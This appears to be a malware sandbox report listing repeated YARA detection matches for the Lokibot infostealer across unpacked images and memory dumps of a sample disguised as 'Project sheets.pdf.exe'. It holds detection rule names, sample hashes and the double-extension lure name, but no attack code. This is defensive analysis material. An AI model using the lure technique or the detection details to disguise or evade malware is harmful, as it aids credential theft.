Source: 3.0.cvtres.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 3.0.cvtres.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 3.0.cvtres.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 3.0.cvtres.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 3.0.cvtres.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 3.0.cvtres.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 3.0.cvtres.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 3.0.cvtres.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 3.0.cvtres.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 3.0.cvtres.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 3.0.cvtres.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 3.0.cvtres.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 3.0.cvtres.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 3.0.cvtres.exe.400000.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 3.0.cvtres.exe.400000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 3.0.cvtres.exe.400000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 3.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 3.0.cvtres.exe.400000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 3.0.cvtres.exe.400000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 3.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 3.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 3.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.cvtres.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 3.2.cvtres.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 3.2.cvtres.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 3.2.cvtres.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 3.2.cvtres.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 3.0.cvtres.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 3.0.cvtres.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 3.0.cvtres.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 3.0.cvtres.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 3.0.cvtres.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 0.2.Project sheets.pdf.exe.41d5530.5.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 3.0.cvtres.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 3.0.cvtres.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 3.0.cvtres.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 3.0.cvtres.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 3.0.cvtres.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 3.0.cvtres.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 3.0.cvtres.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Project sheets.pdf.exe.41d5530.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.Project sheets.pdf.exe.41d5530.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.Project sheets.pdf.exe.41d5530.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.Project sheets.pdf.exe.41d5530.5.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 3.0.cvtres.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.Project sheets.pdf.exe.41d5530.5.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.Project sheets.pdf.exe.41d5530.5.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Project sheets.pdf.exe.41d5530.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.Project sheets.pdf.exe.41d5530.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 3.0.cvtres.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 3.0.cvtres.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.Project sheets.pdf.exe.41d5530.5.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 3.0.cvtres.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 3.0.cvtres.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Project sheets.pdf.exe.41d5530.5.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 3.0.cvtres.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 3.0.cvtres.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 3.0.cvtres.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 3.0.cvtres.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 3.0.cvtres.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 3.0.cvtres.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 3.0.cvtres.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 3.0.cvtres.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 3.0.cvtres.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 3.0.cvtres.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 3.0.cvtres.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000000.243627091.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000002.246158939.0000000003200000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000000.00000002.246158939.0000000003200000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000002.246158939.0000000003200000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000000.244592530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000003.00000000.244592530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000003.00000000.244592530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000003.00000000.244592530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000003.00000000.244592530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000000.244853180.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000003.00000000.244853180.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000003.00000000.244853180.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000003.00000000.244853180.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
